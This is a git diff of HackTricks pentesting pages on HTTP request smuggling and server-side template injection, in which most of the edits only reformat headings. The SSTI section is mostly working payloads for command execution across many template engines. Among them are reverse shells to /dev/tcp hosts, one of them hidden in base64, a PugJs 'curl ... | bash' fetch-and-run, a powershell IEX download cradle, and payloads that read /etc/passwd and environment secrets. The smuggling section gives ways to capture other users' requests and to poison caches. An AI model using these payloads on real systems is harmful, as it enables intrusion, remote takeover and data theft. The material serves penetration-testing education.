` or some similar header so the back-end knows the IP of the client.\
@@ -240,11 +241,11 @@ For discovering how is the proxy rewriting the request you need to **find a POST
In this case the next request will be appended after `search=` which is also **the parameter whose value is going to be reflected** on the response, therefore it's going to **reflect the headers of the next request**.
Note that **only the length indicated in the `Content-Length` header of the embedded request is going to be reflected**. If you use a low number, only a few bytes will be reflected, if you use a bigger number than the length of all the headers, then the embedded request will throw and error. Then, you should **start** with a **small number** and **increase** it until you see all you wanted to see.\
-Note also that this **technique is also exploitable with a TE.CL** vulnerability but the request must end with `search=\r\n0\r\n`. However, independently of the new line characters the values are going to be appended to the search parameter.
+Note also that this **technique is also exploitable with a TE.CL** vulnerability but the request must end with `search=\r\n0\r\n\r`. However, independently of the new line characters the values are going to be appended to the search parameter.
Finally note that in this attack we are still attacking ourselves to learn how the front-end proxy is rewriting the request.
-#### Capturing other users' requests
+### Capturing other users' requests
If you can find a POST request which is going to save the contents of one of the parameters you can append the following request as the value of that parameter in order to store the quest of the next client:
@@ -268,9 +269,9 @@ In this case, the value of the **parameter comment** is going to be **saved insi
_One limitation with this technique is that it will generally only capture data up until the parameter delimiter that is applicable for the smuggled request. For URL-encoded form submissions, this will be the `&` character, meaning that the content that is stored from the victim user's request will end at the first `&`, which might even appear in the query string._
-Note also that this **technique is also exploitable with a TE.CL** vulnerability but the request must end with `search=\r\n0\r\n`. However, independently of the new line characters the values are going to be appended to the search parameter.
+Note also that this **technique is also exploitable with a TE.CL** vulnerability but the request must end with `search=\r\n0\r\n\r`. However, independently of the new line characters the values are going to be appended to the search parameter.
-#### Using HTTP request smuggling to exploit reflected XSS
+### Using HTTP request smuggling to exploit reflected XSS
If the web page is also **vulnerable to Reflected XSS**, you can abuse HTTP Request Smuggling to attack clients of the web. The exploitation of Reflected XSS from HTTP Request Smuggling have some advantages:
@@ -296,7 +297,7 @@ If a web is vulnerable to Reflected XSS on the User-Agent header you can use thi
\`\`\
`A=`
-#### Using HTTP request smuggling to turn an on-site redirect into an open redirect
+### Using HTTP request smuggling to turn an on-site redirect into an open redirect
Many applications perform on-site redirects from one URL to another and place the hostname from the request's `Host` header into the redirect URL. An example of this is the default behavior of Apache and IIS web servers, where a request for a folder without a trailing slash receives a redirect to the same folder including the trailing slash:
@@ -330,7 +331,7 @@ The smuggled request will trigger a redirect to the attacker's website, which wi
Here, the user's request was for a JavaScript file that was imported by a page on the web site. The attacker can fully compromise the victim user by returning their own JavaScript in the response.
-#### Using HTTP request smuggling to perform web cache poisoning
+### Using HTTP request smuggling to perform web cache poisoning
If any part of the **front-end infrastructure performs caching of content** (generally for performance reasons) the it **might be possible to poison that cache modifying the response of the server**.
@@ -360,7 +361,7 @@ Then, **after poisoning the socket**, you need to send a **GET request** to \*\*
The next time that somebody ask for `/static/include.js` the cached contents of the attackers script will be server (general XSS).
-#### Using HTTP request smuggling to perform web cache deception
+### Using HTTP request smuggling to perform web cache deception
> **What is the difference between web cache poisoning and web cache deception?**
>
@@ -381,7 +382,7 @@ In this variant, the attacker smuggles a request that returns some sensitive use
If the **poison reaches a client that was accessing some static content** like `/someimage.png` that was going to be **cached**. The contents of `/private/messages` of the victim will be cached in `/someimage.png` and the attacker will be able to steal them.\
Note that the **attacker doesn't know which static content the victim was trying to access** so probably the best way to test this is to perform the attack, wait a few seconds and **load all** the static contents and **search for the private data**.
-#### Weaponizing HTTP Request Smuggling with HTTP Response Desynchronisation
+### Weaponizing HTTP Request Smuggling with HTTP Response Desynchronisation
Have you found some HTTP Request Smuggling vulnerability and you don't know how to exploit it. Try these other method of exploitation:
@@ -389,9 +390,9 @@ Have you found some HTTP Request Smuggling vulnerability and you don't know how
[http-response-smuggling-desync.md](../http-response-smuggling-desync.md)
{% endcontent-ref %}
-### Turbo intruder scripts
+## Turbo intruder scripts
-#### CL.TE
+### CL.TE
From [https://hipotermia.pw/bb/http-desync-idor](https://hipotermia.pw/bb/http-desync-idor)
@@ -434,7 +435,7 @@ def handleResponse(req, interesting):
table.add(req)
```
-#### TE.CL
+### TE.CL
From: [https://hipotermia.pw/bb/http-desync-account-takeover](https://hipotermia.pw/bb/http-desync-account-takeover)
@@ -480,13 +481,13 @@ def handleResponse(req, interesting):
table.add(req)
```
-### More info
+## More info
![](../../.gitbook/assets/EKi5edAUUAAIPIK.jpg)
[Image from here.](https://twitter.com/SpiderSec/status/1200413390339887104?ref\_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1200413390339887104\&ref\_url=https%3A%2F%2Ftwitter.com%2FSpiderSec%2Fstatus%2F1200413390339887104)
-### Tools
+## Tools
* [https://github.com/anshumanpattnaik/http-request-smuggling](https://github.com/anshumanpattnaik/http-request-smuggling)
* [https://github.com/PortSwigger/http-request-smuggler](https://github.com/PortSwigger/http-request-smuggler)
@@ -494,7 +495,7 @@ def handleResponse(req, interesting):
* [https://github.com/defparam/smuggler](https://github.com/defparam/smuggler)
* [https://github.com/bahruzjabiyev/t-reqs-http-fuzzer](https://github.com/bahruzjabiyev/t-reqs-http-fuzzer): This tool is a grammar-based HTTP Fuzzer useful to find weird request smuggling discrepancies.
-### References
+## References
* [https://portswigger.net/web-security/request-smuggling](https://portswigger.net/web-security/request-smuggling)
* [https://portswigger.net/web-security/request-smuggling/finding](https://portswigger.net/web-security/request-smuggling/finding)
@@ -504,6 +505,7 @@ def handleResponse(req, interesting):
* [https://memn0ps.github.io/2019/11/02/HTTP-Request-Smuggling-CL-TE.html](https://memn0ps.github.io/2019/11/02/HTTP-Request-Smuggling-CL-TE.html)
* [https://standoff365.com/phdays10/schedule/tech/http-request-smuggling-via-higher-http-versions/](https://standoff365.com/phdays10/schedule/tech/http-request-smuggling-via-higher-http-versions/)
+
Support HackTricks and get benefits!
@@ -519,3 +521,5 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+
diff --git a/pentesting-web/ssti-server-side-template-injection/README.md b/pentesting-web/ssti-server-side-template-injection/README.md
index 2d30c75c..3df7eb48 100644
--- a/pentesting-web/ssti-server-side-template-injection/README.md
+++ b/pentesting-web/ssti-server-side-template-injection/README.md
@@ -1,4 +1,4 @@
-# SSTI (Server Side Template Injection)
+
@@ -16,9 +16,10 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-## SSTI (Server Side Template Injection)
-### What is server-side template injection?
+# SSTI (Server Side Template Injection)
+
+## What is server-side template injection?
A server-side template injection occurs when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side.
@@ -36,17 +37,17 @@ In the previous example **part of the template** itself is being **dynamically g
http://vulnerable-website.com/?name={{bad-stuff-here}}
```
-### Constructing a server-side template injection attack
+## Constructing a server-side template injection attack
![](../../.gitbook/assets/ssti-methodology-diagram.png)
-#### Detect
+### Detect
As with any vulnerability, the first step towards exploitation is being able to find it. Perhaps the simplest initial approach is to try **fuzzing the template** by injecting a sequence of special characters commonly used in template expressions, such as the polyglot **`${{<%[%'"}}%\`.**\
In order to check if the server is vulnerable you should **spot the differences** between the response with **regular data** on the parameter and the **given payload**.\
If an **error is thrown** it will be quiet easy to figure out that **the server is vulnerable** and even which **engine is running**. But you could also find a vulnerable server if you were **expecting** it to **reflect** the given payload and it is **not being reflected** or if there are some **missing chars** in the response.
-**Detect - Plaintext context**
+#### Detect - Plaintext context
The given input is being **rendered and reflected** into the response. This is easily **mistaken for a simple** [**XSS**](../xss-cross-site-scripting/) vulnerability, but it's easy to differentiate if you try to set **mathematical operations** within a template expression:
@@ -58,7 +59,7 @@ ${{7*7}}
#{7*7}
```
-**Detect - Code context**
+#### Detect - Code context
In these cases the **user input** is being placed **within** a **template expression**:
@@ -71,7 +72,7 @@ The URL access that page could be similar to: `http://vulnerable-website.com/?gr
If you **change** the **`greeting`** parameter for a **different value** the **response won't contain the username**, but if you access something like: `http://vulnerable-website.com/?greeting=data.username}}hello` then, **the response will contain the username** (if the closing template expression chars were **`}}`**).\
If an **error** is thrown during these test, it will be easier to find that the server is vulnerable.
-#### Identify
+### Identify
Once you have detected the template injection potential, the next step is to identify the template engine.\
Although there are a huge number of templating languages, many of them use very similar syntax that is specifically chosen not to clash with HTML characters.
@@ -88,9 +89,9 @@ Otherwise, you'll need to manually **test different language-specific payloads**
![](<../../.gitbook/assets/image (272).png>)
-#### Exploit
+### Exploit
-**Read**
+#### Read
The first step after finding template injection and identifying the template engine is to read the documentation. Key areas of interest are:
@@ -99,7 +100,7 @@ The first step after finding template injection and identifying the template eng
* Lists of builtin methods, functions, filters, and variables.
* Lists of extensions/plugins - some may be enabled by default.
-**Explore**
+#### Explore
Assuming no exploits have presented themselves, the next step is to **explore the environment** to find out exactly what **you have access to**. You can expect to find both **default objects** provided by the template engine, and **application-specific objects** passed in to the template by the developer. Many template systems expose a 'self' or namespace object containing everything in scope, and an idiomatic way to list an object's attributes and methods.
@@ -107,13 +108,13 @@ If there's no builtin self object you're going to have to bruteforce variable na
Developer-supplied objects are particularly likely to contain sensitive information, and may vary between different templates within an application, so this process should ideally be applied to every distinct template individually.
-**Attack**
+#### **Attack**
At this point you should have a **firm idea of the attack surface available** to you and be able to proceed with traditional security audit techniques, reviewing each function for exploitable vulnerabilities. It's important to approach this in the context of the wider application - some functions can be used to exploit application-specific features. The examples to follow will use template injection to trigger arbitrary object creation, arbitrary file read/write, remote file include, information disclosure and privilege escalation vulnerabilities.
-### Tools
+## Tools
-#### [Tplmap](https://github.com/epinna/tplmap)
+### [Tplmap](https://github.com/epinna/tplmap)
```python
python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
@@ -121,17 +122,17 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomm
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
```
-### Exploits
+## Exploits
-#### Generic
+### Generic
In this **wordlist** you can find **variables defined** in the environments of some of the engines mentioned below:
* [https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-special-vars.txt](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-special-vars.txt)
-#### Java
+### Java
-**Java - Basic injection**
+#### Java - Basic injection
```java
${7*7}
@@ -141,13 +142,13 @@ ${class.getResource("").getPath()}
${class.getResource("../../../../../index.htm").getContent()}
```
-**Java - Retrieve the system’s environment variables**
+#### Java - Retrieve the system’s environment variables
```java
${T(java.lang.System).getenv()}
```
-**Java - Retrieve /etc/passwd**
+#### Java - Retrieve /etc/passwd
```java
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
@@ -155,7 +156,7 @@ ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
```
-#### FreeMarker (Java)
+### FreeMarker (Java)
You can try your payloads at [https://try.freemarker.apache.org](https://try.freemarker.apache.org)
@@ -173,7 +174,7 @@ ${"freemarker.template.utility.Execute"?new()("id")}
${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/home/carlos/my_password.txt').toURL().openStream().readAllBytes()?join(" ")}
```
-**Freemarker - Sandbox bypass**
+#### Freemarker - Sandbox bypass
⚠️ only works on Freemarker versions below 2.3.30
@@ -185,12 +186,12 @@ ${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI()
${dwf.newInstance(ec,null)("id")}
```
-**More information**
+#### More information
* In FreeMarker section of [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#freemarker](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#freemarker)
-#### Velocity (Java)
+### Velocity (Java)
```java
#set($str=$class.inspect("java.lang.String").type)
@@ -203,12 +204,12 @@ $str.valueOf($chr.toChars($out.read()))
#end
```
-**More information**
+#### More information
* In Velocity section of [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#velocity](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#velocity)
-#### Thymeleaf (Java)
+### Thymeleaf (Java)
The typical test expression for SSTI is `${7*7}`. This expression works in Thymeleaf, too. If you want to achieve remote code execution, you can use one of the following test expressions:
@@ -225,7 +226,7 @@ If we take a deeper look into the documentation of the Thymeleaf template engine
#{selection.__${sel.code}__}
```
-**Vulnerable example**
+#### Vulnerable example
```markup
@@ -234,11 +235,11 @@ http://localhost:8082/(7*7)
http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')})
```
-**More information**
+#### More information
* [https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/](https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/)
-#### Spring View Manipulation (Java)
+### Spring View Manipulation (Java)
```java
__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x
@@ -247,7 +248,7 @@ __${T(java.lang.Runtime).getRuntime().exec("touch executed")}__::.x
[https://github.com/veracode-research/spring-view-manipulation](https://github.com/veracode-research/spring-view-manipulation)
-#### Pebble (Java)
+### Pebble (Java)
* `{{ someString.toUPPERCASE() }}`
@@ -266,7 +267,6 @@ New version of Pebble :
-
{% set bytes = (1).TYPE
.forName('java.lang.Runtime')
.methods[6]
@@ -280,7 +280,7 @@ New version of Pebble :
.newInstance(([bytes]).toArray()) }}
```
-#### Jinjava (Java)
+### Jinjava (Java)
```java
{{'a'.toUpperCase()}} would result in 'A'
@@ -289,7 +289,7 @@ New version of Pebble :
Jinjava is an open source project developed by Hubspot, available at [https://github.com/HubSpot/jinjava/](https://github.com/HubSpot/jinjava/)
-**Jinjava - Command execution**
+#### Jinjava - Command execution
Fixed by [https://github.com/HubSpot/jinjava/pull/230](https://github.com/HubSpot/jinjava/pull/230)
@@ -303,11 +303,11 @@ Fixed by [https://github.com/HubSpot/jinjava/pull/230](https://github.com/HubSpo
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
```
-**More information**
+#### More information
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinjava](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinjava)
-#### Hubspot - HuBL (Java)
+### Hubspot - HuBL (Java)
* `{% %}` statement delimiters
* `{{ }}` expression delimiters
@@ -336,7 +336,6 @@ Search for "com.hubspot.content.hubl.context.TemplateContextRequest" and discove
//It was also possible to call methods on the created object by combining the
-
{% raw %}
{% %} and {{ }} blocks
{% set ji='a'.getClass().forName('com.hubspot.jinjava.Jinjava').newInstance().newInterpreter() %}
@@ -362,11 +361,11 @@ Payload: {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstanc
//Output: Linux bumpy-puma 4.9.62-hs4.el6.x86_64 #1 SMP Fri Jun 1 03:00:47 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
```
-**More information**
+#### More information
* [https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html)
-#### Expression Language - EL (Java)
+### Expression Language - EL (Java)
* `${"aaaa"}` - "aaaa"
* `${99999+1}` - 100000.
@@ -381,7 +380,7 @@ Check the following page to learn more about the **exploitation of EL interprete
[el-expression-language.md](el-expression-language.md)
{% endcontent-ref %}
-#### Smarty (PHP)
+### Smarty (PHP)
```php
{$smarty.version}
@@ -391,12 +390,12 @@ Check the following page to learn more about the **exploitation of EL interprete
{system('cat index.php')} // compatible v3
```
-**More information**
+#### More information
* In Smarty section of [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#smarty](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#smarty)
-#### Twig (PHP)
+### Twig (PHP)
* `{{7*7}} = 49`
* `${7*7} = ${7*7}`
@@ -423,7 +422,7 @@ Check the following page to learn more about the **exploitation of EL interprete
{{['cat$IFS/etc/passwd']|filter('system')}}
```
-**Twig - Template format**
+#### Twig - Template format
```php
$output = $twig > render (
@@ -437,12 +436,12 @@ $output = $twig > render (
);
```
-**More information**
+#### More information
* In Twig and Twig (Sandboxed) section of [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig)
-#### Jade (NodeJS)
+### Jade (NodeJS)
```javascript
- var x = root.process
@@ -455,12 +454,12 @@ $output = $twig > render (
#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout}
```
-**More information**
+#### More information
* In Jade section of [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jade--codepen](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jade--codepen)
-#### Handlebars (NodeJS)
+### Handlebars (NodeJS)
Path Traversal (more info [here](https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/)).
@@ -497,11 +496,11 @@ URLencoded:
%7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%0d%0a%20%20%7b%7b%23%77%69%74%68%20%22%65%22%7d%7d%0d%0a%20%20%20%20%7b%7b%23%77%69%74%68%20%73%70%6c%69%74%20%61%73%20%7c%63%6f%6e%73%6c%69%73%74%7c%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%28%6c%6f%6f%6b%75%70%20%73%74%72%69%6e%67%2e%73%75%62%20%22%63%6f%6e%73%74%72%75%63%74%6f%72%22%29%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%23%77%69%74%68%20%73%74%72%69%6e%67%2e%73%70%6c%69%74%20%61%73%20%7c%63%6f%64%65%6c%69%73%74%7c%7d%7d%0d%0a%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0d%0a%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%22%72%65%74%75%72%6e%20%72%65%71%75%69%72%65%28%27%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%27%29%2e%65%78%65%63%28%27%72%6d%20%2f%68%6f%6d%65%2f%63%61%72%6c%6f%73%2f%6d%6f%72%61%6c%65%2e%74%78%74%27%29%3b%22%7d%7d%0d%0a%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0d%0a%20%20%20%20%20%20%20%20%7b%7b%23%65%61%63%68%20%63%6f%6e%73%6c%69%73%74%7d%7d%0d%0a%20%20%20%20%20%20%20%20%20%20%7b%7b%23%77%69%74%68%20%28%73%74%72%69%6e%67%2e%73%75%62%2e%61%70%70%6c%79%20%30%20%63%6f%64%65%6c%69%73%74%29%7d%7d%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%7d%7d%0d%0a%20%20%20%20%20%20%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%20%20%20%20%20%20%20%20%7b%7b%2f%65%61%63%68%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%20%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%7b%7b%2f%77%69%74%68%7d%7d
```
-**More information**
+#### More information
* [http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html](http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html)
-#### JsRender (NodeJS)
+### JsRender (NodeJS)
| **Template** | **Description** |
| ------------ | --------------------------------------- |
@@ -512,40 +511,40 @@ URLencoded:
* \= 49
-**Client Side**
+#### Client Side
```python
{{:%22test%22.toString.constructor.call({},%22alert(%27xss%27)%22)()}}
```
-**Server Side**
+#### Server Side
```bash
{{:"pwnd".toString.constructor.call({},"return global.process.mainModule.constructor._load('child_process').execSync('cat /etc/passwd').toString()")()}}
```
-**More information**
+#### More information
* [https://appcheck-ng.com/template-injection-jsrender-jsviews/](https://appcheck-ng.com/template-injection-jsrender-jsviews/)
-#### PugJs (NodeJS)
+### PugJs (NodeJS)
* `#{7*7} = 49`
* `#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('touch /tmp/pwned.txt')}()}`
* `#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('curl 10.10.14.3:8001/s.sh | bash')}()}`
-**Example server side render**
+#### Example server side render
```javascript
var pugjs = require('pug');
home = pugjs.render(injected_page)
```
-**More information**
+#### More information
* [https://licenciaparahackear.github.io/en/posts/bypassing-a-restrictive-js-sandbox/](https://licenciaparahackear.github.io/en/posts/bypassing-a-restrictive-js-sandbox/)
-#### NUNJUCKS (NodeJS)
+### NUNJUCKS (NodeJS)
* \{{7\*7\}} = 49
* \{{foo\}} = No output
@@ -557,11 +556,11 @@ home = pugjs.render(injected_page)
{{range.constructor("return global.process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/10.10.14.11/6767 0>&1\"')")()}}
```
-**More information**
+#### More information
* [http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine](http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine)
-#### ERB (Ruby)
+### ERB (Ruby)
* `{{7*7}} = {{7*7}}`
* `${7*7} = ${7*7}`
@@ -580,11 +579,11 @@ home = pugjs.render(injected_page)
<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>
```
-**More information**
+#### More information
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby)
-#### Slim (Ruby)
+### Slim (Ruby)
* `{ 7 * 7 }`
@@ -592,11 +591,11 @@ home = pugjs.render(injected_page)
{ %x|env| }
```
-**More information**
+#### More information
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby)
-#### Python
+### Python
Check out the following page to learn tricks about **arbitrary command execution bypassing sandboxes** in python:
@@ -604,7 +603,7 @@ Check out the following page to learn tricks about **arbitrary command execution
[bypass-python-sandboxes](../../misc/basic-python/bypass-python-sandboxes/)
{% endcontent-ref %}
-#### Tornado (Python)
+### Tornado (Python)
* `{{7*7}} = 49`
* `${7*7} = ${7*7}`
@@ -618,13 +617,12 @@ Check out the following page to learn tricks about **arbitrary command execution
{% endraw %}
-
{{os.system('whoami')}}
```
-**More information**
+#### More information
-#### Jinja2 (Python)
+### Jinja2 (Python)
[Official website](http://jinja.pocoo.org)
@@ -648,13 +646,12 @@ Check out the following page to learn tricks about **arbitrary command execution
-
{{settings.SECRET_KEY}}
{{4*4}}[[5*5]]
{{7*'7'}} would result in 7777777
```
-**Jinja2 - Template format**
+#### Jinja2 - Template format
```python
{% raw %}
@@ -669,7 +666,7 @@ Check out the following page to learn tricks about **arbitrary command execution
{% endraw %}
```
-**Jinja2 - Debug Statement**
+#### Jinja2 - Debug Statement
If the Debug Extension is enabled, a \`
@@ -679,19 +676,17 @@ If the Debug Extension is enabled, a \`
-
{% raw %}
{% debug %}
{% endraw %}
-
```
Source: [https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement](https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement)
-**Jinja2 - Dump all used classes**
+#### Jinja2 - Dump all used classes
```python
{{ [].class.base.subclasses() }}
@@ -699,7 +694,7 @@ Source: [https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement]
{{ ''.__class__.__mro__[2].__subclasses__() }}
```
-**Jinja2 - Dump all config variables**
+#### Jinja2 - Dump all config variables
```python
{% raw %}
@@ -710,7 +705,7 @@ Source: [https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement]
{% endraw %}
```
-**Jinja2 - Read remote file**
+#### Jinja2 - Read remote file
```python
# ''.__class__.__mro__[2].__subclasses__()[40] = File class
@@ -720,13 +715,13 @@ Source: [https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement]
{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}
```
-**Jinja2 - Write into remote file**
+#### Jinja2 - Write into remote file
```python
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
```
-**Jinja2 - Remote Code Execution**
+#### Jinja2 - Remote Code Execution
Listen for connection
@@ -767,7 +762,6 @@ More:
-
{% raw %}
{% with a = request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("echo -n YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40LzkwMDEgMD4mMQ== | base64 -d | bash")["read"]() %} a {% endwith %}
{% endraw %}
@@ -795,7 +789,7 @@ More:
{{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }}
```
-**Jinja2 - Filter bypass**
+#### Jinja2 - Filter bypass
```python
request.__class__
@@ -834,12 +828,12 @@ Bypassing most common filters ('.','\_','|join','\[',']','mro' and 'base') by [h
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr(
```
-**More information**
+#### More information
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2)
* Check [attr trick to bypass blacklisted chars in here](../../misc/basic-python/bypass-python-sandboxes/#python3).
-#### Mako (Python)
+### Mako (Python)
```python
<%
@@ -849,7 +843,7 @@ x=os.popen('id').read()
${x}
```
-#### Razor (.Net)
+### Razor (.Net)
* `@(2+2) <= Success`
* `@() <= Success`
@@ -869,7 +863,7 @@ ${x}
* [https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-\(SSTI\)-in-ASP.NET-Razor/)
* [https://www.schtech.co.uk/razor-pages-ssti-rce/](https://www.schtech.co.uk/razor-pages-ssti-rce/)
-#### ASP
+### ASP
* `<%= 7*7 %>` = 49
* `<%= "foo" %>` = foo
@@ -880,11 +874,11 @@ ${x}
<%= CreateObject("Wscript.Shell").exec("powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.11:8000/shell.ps1')").StdOut.ReadAll() %>
```
-**More Information**
+#### More Information
* [https://www.w3schools.com/asp/asp\_examples.asp](https://www.w3schools.com/asp/asp\_examples.asp)
-#### Mojolicious (Perl)
+### Mojolicious (Perl)
Even if it's perl it uses tags like ERB in Ruby.
@@ -896,7 +890,7 @@ Even if it's perl it uses tags like ERB in Ruby.
<% perl code %>
```
-#### SSTI in GO
+### SSTI in GO
The way to confirm that the template engine used in the backed is Go you can use these payloads:
@@ -905,14 +899,14 @@ The way to confirm that the template engine used in the backed is Go you can use
* `{{printf "%s" "ssti" }}` = should output the string ssti in the response
* `{{html "ssti"}}`, `{{js "ssti"}}` = These are a few other payloads which should output the string "ssti" without the trailing words "js" or "html". You can refer to more keywords in the engine [here](https://golang.org/pkg/text/template).
-**XSS exploitation**
+#### XSS exploitation
If the server is **using the text/template** package, XSS is very easy to achieve by **simply** providing your **payload** as input. However, that is **not the case with html/template** as itHTMLencodes the response: `{{""}}` --> `<script>alert(1)</script>`
However, Go allows to **DEFINE** a whole **template** and then **later call it**. The payload will be something like:\
`{{define "T1"}}{{end}} {{template "T1"}}`
-**RCE Exploitation**
+#### RCE Exploitation
